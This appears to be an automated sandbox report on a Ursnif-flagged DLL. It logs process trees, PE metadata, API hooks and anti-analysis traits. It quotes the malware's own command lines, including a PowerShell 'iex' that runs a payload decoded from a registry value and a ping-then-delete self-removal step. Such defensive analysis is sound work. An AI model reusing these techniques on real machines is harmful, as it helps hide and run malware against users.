Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES352.tmp' 'c:\Users\user\AppData\Local\Temp\fcanujkk\CSC3173F20A33D44EE3A49D2AFD78C0E6C5.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1BBC.tmp' 'c:\Users\user\AppData\Local\Temp\m5xmn43s\CSCBE8D23AB53C749FF947299C54732EF79.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001D.00000002.925789248.000002946AE90000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.938527540.000001F33B7D0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000002.1051265243.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: \fk.pdb$. source: powershell.exe, 0000001A.00000003.995503256.000001E7C3283000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.944587452.00000000064F0000.00000004.00000001.sdmp
Source: Binary string: c:\climbThrough\Bedclear\ranCentury\Exercise.pdb source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.944587452.00000000064F0000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000002.1051265243.0000000005A00000.00000002.00000001.sdmp
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA95DC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_05FA95DC
Registers a DLL
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FC6E10 push ecx; ret 2_2_05FC6E19
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FC7177 push ecx; ret 2_2_05FC7187
Source: C:\Windows\explorer.exe Code function: 36_2_04DCC131 push 3B000001h; retf 36_2_04DCC136
Source: initial sample Static PE information: section name: .text entropy: 6.87784518477

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000002.00000003.860537429.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860574233.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860667381.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860601592.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860502446.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860680858.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.876294685.00000000059AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.938337595.0000000003320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860649674.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860628580.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6988, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Uses ping.exe to sleep
Source: unknown Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3455
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5616
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 204 Thread sleep count: 50 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6980 Thread sleep count: 35 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6980 Thread sleep count: 35 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6980 Thread sleep count: 45 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6980 Thread sleep count: 70 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008 Thread sleep time: -7378697629483816s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FC4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 2_2_05FC4FE1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FAE0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 2_2_05FAE0BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 2_2_05FB888D
Source: C:\Windows\explorer.exe Code function: 36_2_04DAECE0 RtlAllocateHeap,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 36_2_04DAECE0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB05EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 2_2_05FB05EF
